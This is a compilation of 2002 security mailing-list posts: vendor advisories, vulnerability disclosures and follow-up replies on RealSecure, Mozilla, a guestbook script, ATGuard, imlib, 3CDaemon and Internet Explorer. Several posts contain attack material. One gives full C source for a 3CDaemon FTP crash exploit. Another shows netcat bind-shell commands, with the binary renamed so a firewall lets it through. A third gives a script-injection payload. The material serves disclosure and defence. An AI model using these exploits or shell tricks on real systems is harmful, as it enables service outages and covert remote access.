-BEGIN PGP SIGNED MESSAGE- Internet Security Systems Security Advisory April 30, 2002 Remote Denial of Service Vulnerability in RealSecure Network Sensor Synopsis: ISS X-Force has learned of a denial of service (DoS) vulnerability that affects Internet Security Systems RealSecure Network Sensor. This vulnerability may allow remote attackers to crash RealSecure by sending specially crafted packets to network segments monitored by RealSecure. RealSecure X-Press Update 4.3 contains a fix for the DHCP vulnerability and is available for immediate download on the ISS download center. Affected Versions: RealSecure Network Sensor 5.x, XPU 3.4 and later RealSecure Network Sensor 6.0, XPU 3.4 and later RealSecure Network Sensor 6.5 Description: RealSecure Network Sensor has three informational signatures associated with DHCP (Dynamic Host Configuration Protocol): DHCP_ACK (7131), DHCP_Discover (7132), and DHCP_Request (7133). These signatures contain a flaw that will result in an illegal attempt to de-reference a null memory pointer when RealSecure detects certain types of DHCP traffic. This action may generate an exception error or a segmentation fault which can cause the RealSecure sensor to crash. This vulnerability was introduced in RealSecure Network Sensor 6.5. XPU 3.4 delivered the vulnerable DHCP signatures to older RealSecure product lines including 6.0 and 5.x. It may be possible for remote attackers to create specially-crafted DHCP traffic to cause the sensor to malfunction or crash entirely. The three DHCP signatures were disabled by default in Network Sensor 5.x and 6.0. The signatures were enabled by default in Network Sensor 6.5 within the Maximum policy. However, if these signatures are not enabled, RealSecure Network Sensor is not vulnerable to these attacks. Recommendations: X-Force recommends that all RealSecure customers tune their policies to their environments. RealSecure X-Press Update 4.3 contains a fix for the DHCP vulnerability. X-Press Update 4.3 is available for download on the ISS download center: http://www.iss.net/download/. DHCP traffic is commonly blocked at perimeter firewalls. Network administrators are advised to assess their network perimeter defenses routinely. Exploitation of this vulnerability is blocked by proper filtering of DHCP traffic on UDP port 67. __ About Internet Security Systems (ISS) Founded in 1994, Internet Security Systems (ISS) (Nasdaq: ISSX) is a pioneer and world leader in software and services that protect critical online resources from an ever-changing spectrum of threats and misuse. Internet Security Systems is headquartered in Atlanta, GA, with additional operations throughout the Americas, Asia, Australia, Europe and the Middle East. Copyright (c) 2002 Internet Security Systems, Inc. All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this document. It is not to be edited or altered in any way without the express written consent of the Internet Security Systems X-Force. If you wish to reprint the whole or any part of this document in any other medium excluding electronic media, please email [EMAIL PROTECTED] for permission. Disclaimer: The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. X-Force PGP Key available on MIT's PGP key server and PGP.com's key server, as well as at http://www.iss.net/security_center/sensitive.php Please send suggestions, updates, and comments to: X-Force -BEGIN PGP SIGNATURE- Version: 2.6.2 iQCVAwUBPM7pJjRfJiV99eG9AQHBBAQAmh7q8UVXJcdNbSpuiSA0oyVSgLhqc1O2 bQyGOeNbbWhTLWQ3pMzcBjx4vjTE34dI4T4OT7PLlGVuvcW4fLG70Lq+Fsr34gQj E17UWKvqvD+AUXvcMq0gxjV15uykkmhy01zZ+Cwn5LsjWXjzpy4r/a7OzZ13Lzrq u7+bVixmr70= =m3XN -END PGP SIGNATURE-
RE: Reading local files in Netscape 6 and Mozilla (GM#001-NS)
Demonstration: == A fully dynamic proof-of-concept demonstration of this issue is available at http://security.greymagic.com/adv/gm001-ns/. As some of you may have noticed, the above proof-of-concept does not work in Mozilla 1.0 Release Candidate 1. Don't get your hopes high about this though, the issue has not been fixed in moz1rc1 - the XMLHttpRequest was simply broken in this version of the browser for unknown reasons, a fact not mentioned in the release notes. When trying to use it, either nothing happens or the browser crashes. The proof-of-concept works just fine in Mozilla 0.9.9 (and NS6.1+), and would work fine in moz1rc1 if the XMLHttpRequest object could be used at all. The Mozilla XML-Extras project also includes a document.load method that is used to load XML documents. The same issue applies to this method, and a proof-of-concept demonstration that also works in moz1rc1 can be found at http://jscript.dk/2002/4/NS6Tests/documentload.html Regards Thor Larholm Jubii A/S - Internet Programmer
Levcgi.coms MyGuestbook JavaScript Injection Vulnerability
___ __ _____ |\ \ |\ \ |\ \|\ \|\ \ |\_\ | \ \__|\ \ | \ \__|\ \ | \ \ \ \ \ \ | | |\ \ | \ \___ | \ \ \ \ \ \_| \_| \ \|___| \ \__| \ \ \_|\ \_ \ \ \__|\ \ \ \ _ \ \ \ \ \ \ \\ \ \ \ \ \ \ \ \ \ \ |\ http://rawt.daemon.sh \ \___\\ \___\ \ \___\ \ \___\ \ \| \_\ \ \___\ \ | | \ | | \ | | \ | | \ | |\ || \ | | \|___| \|___| \|___| \|___| \|___| \||\|___| Levcgi.coms MyGuestbook JavaScript Injection Vulnerability Discovered By BrainRawt ([EMAIL PROTECTED]) About MyGuestbook: -- Highly customizable guestbook that was released on Feb. 20, 2002, and can be downloaded at http://www.levcgi.com/programs.cgi?program=myguestbook According to the website, ...myGuestbook has been downloaded 1298 times! Vulnerable (tested) Versions: MyGuestbook v 1.0 Vendor Contact: 4-28-02 - Emailed [EMAIL PROTECTED] 4-30-02 - No Reply from the author and I have decided not to wait since I never got a reply about another concern i had several months ago involving one of his cgi scripts. Vulnerability: myguestbook inproperly filters input to the guestbook making the guestbook prone to cross-site scripting attacks by malicious visitors to the site. This could be a medium to high concern when mixed with a website that uses cookies. Exploit (POC): Sign up and post using the name scriptalert('evil+java+script+here')/script or When posting comments just insert the scriptalert('evil+java+script+here')/script to the comments field. -- Knowledge is Power! How Powerful are you? - BrainRawt _ Send and receive Hotmail on your mobile device: http://mobile.msn.com
Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible
As far as i see the article you gave me at tooleaky.zensoft.com mostly deals with outbound connections. The ATGuard-Problem still goes futher, it is also a problem with inbound connections. I use a Xitami Webserver on Port 50080 for testing purposes. This Xitami Webserver is (currently) allowed to accept all connections on all ports (this is also a configuration problem, but most people just allow inbound connections from any address to any port for an application). So, i just did the following: I:\cd netcat I:\netcatnc -e c:\winnt\system32\cmd.exe -p 500 -l I tried to connect to port 500 with telnet: ATGuard fires up as it is supposed to. So, now i did the following: I:\netcatcopy nc.exe xiwin32.exe 1 Datei(en) kopiert. (Translation for the curious non-german readers : 1 File copied :) I:\netcatxiwin32.exe -e c:\winnt\system32\cmd.exe -p 500 -l Trying it with telnet again, i got a very nice shell without any notice from ATGuard. That's why i mentioned also trojan horses in my Advisories - just renaming your trojan horse to the name of a program that is allowed to accept inbound connections will do the trick. There is no ultimate way to control all outbound communication. If you use your own low-level drivers, no personal firewall can stop you. Surely there is no ultimate way. But if you are not aware that a problem exists, you can't think about solutions. Also, you perhaps will think that your personal firewall is perfectly safe while it isn't. Best regards, --- BlueScreen / Florian Hobelsberger (UIN: 101782087) Member of: www.IT-Checkpoint.net www.Hackeinsteiger.de www.DvLdW.de == To encrypt classified messages, please download and use this PGP-Key: http://www.florian-hobelsberger.de/BlueScreen-PGP-PubKey.txt ==
Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible
Hi, Ye Olde Disclaimer: The information contained in this email is believed to be true. However, exhaustive regression testing has not been performed. No guarantees or warranties are implicitly or explicitly granted. Use the information within at your own risk. Tested AtGuard version: 3.21.05 Tested OS's: NT4 SP6a, Win95 (don't hit me, I'm cheap) BlueScreen wrote: - itcp advisory 13 [EMAIL PROTECTED] http://www.it-checkpoint.net/advisory/12.html April 29th, 2002 - ITCP Advisory 13: Bypassing of ATGuard Firewall possible - - *snip* DETAILS *snip* Sadly ATGuard doesn't save the file paths / doesn't use checksums (would be much better), to determine wether the executed program is real the one, that is allowed to connect to all hosts on port 80. It just uses the filename (in this case IEXPLORE.EXE). Only if you've created your rule in interactive learning mode. See discussion below. *snip* SOLUTION There doesn't exist an solution, since ATGuard is not developped anymore. We were not able to test the Norton Personal Firewall for this problem, since no one of us owns it. We are contacting Norton directly with this Advisory. Not quite correct. The bug reported in BlueScreen's advisory does exist. However, either the method of testing was incomplete, or the report was incomplete. Also, there is a workaround. AtGuard has the ability to create firewall rules on the fly (in it's interactive learning mode). When a connection is attempted and AtGuard cannot find a matching rule, in interactive learning mode the user is presented with a window containing four options. Two of those options allow the user to specify whether the connection should be allowed or blocked, this one time only. The other two of those options allow the user to create a rule for particular connections (that may either block or allow the connections). This works on either incoming or outgoing connections. When a rule is created in interactive learning mode, *only the application executable name* is stored in the rulebase. This is the bug that BlueScreen pointed out. Without a path to the application file in the rulebase, any application with a similar name can make use of the firewall rule (block or allow, as the case may be). However, AtGuard also allows the user to create their own firewall rules manually. Click on the dashboard or tray icon, and launch the Settings menu item. Click the Add button, create a rule, and make sure you specify an application that the rule applies to (on the Application tab, click Application Shown Above, click the Browse button, and specify the proper application with the File Dialog box). You will find the full path to the file specified in the rule. Shut down your machine, and start it up again, and you'll find the full path still there. You can verify the full path in the registry under the key: HKEY_LOCAL_MACHINE\SOFTWARE\WRQ\IAM\FirewallObjects\Applications Workaround: Manually create firewall rules instead of using interactive learning mode to create rules. If you do use interactive learning mode, you should reopen the Settings menu, and manually adjust the Application Shown Above so it shows the full path to the application that the rule applies to (you apparently don't have to trash all your current rules). This *appears* to resolve the issue (from my brief testing, YMMV). Of course, this still wouldn't prevent someone from replacing the specified file with malware. However, if you're machine has been compromised to that level, it seems to me you've got more to worry about than a few firewall rules :/ It should be noted that AtGuard rules may be created that allow or block access to *all* applications. Such rules appear to not be affected by this bug. ADDITIONAL INFORMATION Vendor has not been contacted. (since he doesn't exist anymore). Actually, the original vendor does exist: http://www.wrq.com. They simply don't sell the product any more. From what I can tell, the original firewall has been sufficiently morphed by Symantec so that it no longer has much resemblance to AtGuard. Thus, I don't think comparisons between products from these two vendors are fair or valid. -UMus B. KidN
AW: ITCP Advisory 13: Bypassing of ATGuard Firewall possible
Most products use checksums to detect replaced or modified applications. But there are other problems with outbound filters. Most personal firewalls do not detect if a malicious program uses a 'trusted' application to transmit data (look at tooleaky.zensoft.com). I have tested several products with a method similar to Bob Sundling's and only BlackICE PC Protection 3.5 stopped communication (Norton PF, Tiny PF and ZoneAlarm did not stop it). There is no ultimate way to control all outbound communication. If you use your own low-level drivers, no personal firewall can stop you. Jonas
Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible
BlueScreen in 014401c1ef8d$1bb66510$0100a8c0@BlueScreenPrimary: ATGuard can be fooled to think that a disallowed program is allowed to connect to the internet. This is a well known problem and has been discussed at length on http://grc.com/lt/scoreboard.htm. A.M Janssen has written utility which monitors the hashes (SHA1, Ripe MD-160 or Haval) for the applications in AtGuard's ruleset http://www.capimonitor.nl/nisfilecheck11.zip. It has to be separately scheduled so it's not as good as real time checks by the firewall but very useful nonetheless.
Security Update: [CSSA-2002-019.0] Linux: imlib processes untrusted images
To: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] __ Caldera International, Inc. Security Advisory Subject:Linux: imlib processes untrusted images Advisory number:CSSA-2002-019.0 Issue date: 2002 April 29 Cross reference: __ 1. Problem Description Imlib versions prior to 1.9.13 would fall back to loading images via the NetPBM package. NetPBM has various problems itself that make it unsuitable for loading untrusted images. This may allow attackers to construct images that, when loaded by a viewer using Imlib, could cause crashes or potentially, the execution of arbitrary code. In addition, this version (1.9.14) also includes some further fixes from the imlib team. 2. Vulnerable Supported Versions System Package -- OpenLinux 3.1.1 Server prior to imlib-1.9.14-1.i386.rpm prior to imlib-devel-1.9.14-1.i386.rpm OpenLinux 3.1.1 Workstation prior to imlib-1.9.14-1.i386.rpm prior to imlib-devel-1.9.14-1.i386.rpm OpenLinux 3.1 Serverprior to imlib-1.9.14-1.i386.rpm prior to imlib-devel-1.9.14-1.i386.rpm OpenLinux 3.1 Workstation prior to imlib-1.9.14-1.i386.rpm prior to imlib-devel-1.9.14-1.i386.rpm 3. Solution The proper solution is to install the latest packages. 4. OpenLinux 3.1.1 Server 4.1 Package Location ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Server/current/RPMS 4.2 Packages 56ed4f4cdf53abc39ba462021496314bimlib-1.9.14-1.i386.rpm 743951ea75a12121f6696a57a6a4d091imlib-devel-1.9.14-1.i386.rpm 4.3 Installation rpm -Fvh imlib-1.9.14-1.i386.rpm rpm -Fvh imlib-devel-1.9.14-1.i386.rpm 4.4 Source Package Location ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Server/current/SRPMS 4.5 Source Packages 7f31fe77f6e8086aced4bb412b46e55cimlib-1.9.14-1.src.rpm 5. OpenLinux 3.1.1 Workstation 5.1 Package Location ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Workstation/current/RPMS 5.2 Packages de20299b700ab3918bed0c782abcd6c3imlib-1.9.14-1.i386.rpm ba96a381bb7c60f20ce74b5645c02fa8imlib-devel-1.9.14-1.i386.rpm 5.3 Installation rpm -Fvh imlib-1.9.14-1.i386.rpm rpm -Fvh imlib-devel-1.9.14-1.i386.rpm 5.4 Source Package Location ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Workstation/current/SRPMS 5.5 Source Packages 060c0a51023524bb1681ac6b68405bd7imlib-1.9.14-1.src.rpm 6. OpenLinux 3.1 Server 6.1 Package Location ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/RPMS 6.2 Packages 72ab762b5b78035581fa9200cac775d7imlib-1.9.14-1.i386.rpm 7e918173391601c5df401be3c7644a78imlib-devel-1.9.14-1.i386.rpm 6.3 Installation rpm -Fvh imlib-1.9.14-1.i386.rpm rpm -Fvh imlib-devel-1.9.14-1.i386.rpm 6.4 Source Package Location ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/SRPMS 6.5 Source Packages 4c864ed09fd05a3740e3a8d6acab2349imlib-1.9.14-1.src.rpm 7. OpenLinux 3.1 Workstation 7.1 Package Location ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/RPMS 7.2 Packages 0e03563711a6c9902b6d7d2016a45c84imlib-1.9.14-1.i386.rpm d0bbec107ff9b58d8851a0cb680bedf3imlib-devel-1.9.14-1.i386.rpm 7.3 Installation rpm -Fvh imlib-1.9.14-1.i386.rpm rpm -Fvh imlib-devel-1.9.14-1.i386.rpm 7.4 Source Package Location ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/SRPMS 7.5 Source Packages 5eed6f4ffeeebf13e266a4078bc45442imlib-1.9.14-1.src.rpm 8. References Specific references for this advisory: none Caldera OpenLinux security resources: http://www.caldera.com/support/security/index.html Caldera UNIX security resources: http://stage.caldera.com/support/security/ This security fix closes Caldera incidents sr862212, fz520437, erg712001. 9. Disclaimer Caldera International, Inc. is not responsible for the misuse of any of the information we provide on this website and/or through our security advisories. Our
3CDaemon DoS exploit
3Cdaemon 2.0 revision 10 for the Windows platform contains a BOF vulnerability at all times, including the login prompt. When 400+ chars are sent to the FTP server, it crashes emmediatly. Remote exploit is included. For more details see the exploit as well. greets, skyrim - [EMAIL PROTECTED] MaD SKiLL 'H' - http://www.madskill.tk _ Join the worlds largest e-mail service with MSN Hotmail. http://www.hotmail.com /* MaD SKiLL 'H' * MsH 4 life! http://www.madskill.tk * *Private Release* * * 3CDaemon 2.0 revision 10 DoS * * 11:12 14-4-2002: BOF flaw found by skyrim * 1:00 15-4-2002: exploit done. * 23:31 16-4-2002: Edited the exploit slightly, it's a better code now * * This program will exploit the buffer overflow vulnerability of * 3CDaemon 2.0 FTP servers. Sending 400+ chars will make the server crash * at any time they're send. * * Tested on: * [OS][version] * Windows XP (5.1 - 2600) 3CDaemon 2.0 revision 10 * * ### * # ## * #### ## * ## ## * ## ### ### ### ### * ## ### * ### # ### ### * ## ## ### ### * ## ### ######## * # ### ## # * ### ### #### * # ### ### *### # # # * # # # * ### # # * ## # ## ## ### * ### ## ### *## *## * ## ## ### ######## * ### ### ## ### * ### ### # # ### * ### # ## ### * ## # # *# * ## ### ## * ## ### ## ## * # ### ### * ## # *# ## ## ## * # ### ### ### ### * * I don't know if this will work on versions other then the one I tested it on. * Have fun. * * Crew shouts go to: MsH, DFA, uDc * Personal shouts to: mannie, primus, amok, torment, talented, warsteam, frodo, maxxo, * xo|l, fearless, cybje, kell, frodo, maxxo, and everyone else. * * skyrim ([EMAIL PROTECTED]) */ #include stdio.h #include sys/types.h #include sys/socket.h #include netinet/in.h #include netdb.h #define BOFSIZE 420 char banner(void) { printf(MaD SKiLL 'H' 3CDaemon 2.0 revision 10 DoS\n.:[MsH]:.\n ---\n); } void E(char *msg) { perror(msg); exit(1); } main(int argc, char *argv[]) { static char ownage[BOFSIZE]; int sockfd, sockfd2, n; struct sockaddr_in server_addr; struct hostent *server; if (argc != 3) { fprintf(stderr,Usage: %s hostname/ip port\n, argv[0]); exit(1); } banner(); memset(ownage, 'A', BOFSIZE); sockfd = socket(AF_INET, SOCK_STREAM, 0); if (sockfd 0) E(Error occured during opening socket); server = gethostbyname(argv[1]); if (server == NULL) E(Error occured during host lookup -No such host?-\n); bzero((char *) server_addr, sizeof(server_addr)); server_addr.sin_family = AF_INET; bcopy((char *)server-h_addr, (char *)server_addr.sin_addr.s_addr, server-h_length); server_addr.sin_port = htons(atoi(argv[2])); printf(Connecting to target FTP server... ); if (connect(sockfd,server_addr,sizeof(server_addr)) 0) { E(Error occured during connecting\n); } printf(Connected, Probing BOF... \n); n = write(sockfd,ownage,strlen(ownage)); if (n 0) { E(Error occured during writing to socket); } close(sockfd); sockfd2=socket(AF_INET, SOCK_STREAM, 0); printf(Done, checking if server is dead.. \n); sleep(5); if (connect(sockfd2,server_addr,sizeof(server_addr)) 0) { printf(Couldn't establish connection: It seems like it died! =)\n); exit(0); } printf(Server is still alive. Perhaps its not vulnerable?\n); return 0; }
RE: Reading local files in Netscape 6 and Mozilla (GM#001-NS)
Funny, so much rant about not receiving any contact from Netscape (AOL subsidiary) or about not even giving prior notification to the developers about the bug AND, all in all, no one even posts to a bugzilla entry on bugzilla.mozilla.org which is the best place for bug reports on Mozilla (ie, *not marketdroid webpages*). This is either ignorance of bugzilla (bad but I can understand that), or intention to difamate the mozilla developers, which is very bad, since a lot of them dedicate their free time on providing us an extremely standards compliant, Free Software, cross platform web browser, and so we actually owe them a favour (so to speak). If it is ignorance, I will, then, try to educate: 1. load your favorite browser, and go to http://bugzilla.mozilla.org 2. submit bug 3. if very urgent, go to irc.mozilla.org, /join #mozillazine and SCREAM SECURITY BUG, can anyone urgently look at *URL*FOR*BUG*ID, please? I can help with details. In any other case than having first tryed to do that, this rant seems absolutely unecessary. Regards -- + No matter how much you do, you never do enough -- unknown + Whatever you do will be insignificant, | but it is very important that you do it -- Ghandi + So let's do it...? signature.asc Description: This is a digitally signed message part
IE/OE6.0 cannot handle malformed XBM files
hello, Internet Explorer [only 6.0] allows the usage of XBM graphic files and tries to display them whenever they're used in any HTML file [as IMG tag] or when attached to an e-mail. XBM structure is very easy it is a text file with C-like syntax and f.ex. looks like #define picture_width ?? // picture width #define picture_height ?? // picture width height static unsigned char picture_bits[] = { //hex picture data ); IE doesn't check properly the content of XBM files and you may force the browser/e-mail client to hang up that will end up in their silent exit because of the Access Violation exception [as shown with a great help of windbg, it is generated inside mshtml.dll]. IE doesn't check the width and height of the image, so you may write whatever you want and IE will try to interprete it, trying to allocate enough memory for an oversized buffer. When previewed f.ex. in Outlook Express, malformed e-mail may force this client to exit (and others that rely on IE). For an example of such malformed e-mail download one from my homepage and try to open by clicking it in Windows Explorer. http://www.sztolnia.pl/hack/xbmbug/xbmbug.eml Don't forget to run OE first :) Adam Baszczyk [02-01-11] [en/pl] Home page/Domowa http://www.mykakee.com [02-01-31] [pl] Pirotechnika http://pyro.pieklo.org [02-04-27] [pl] Sztolnia kodera, FAQ p.c.p. http://www.sztolnia.pl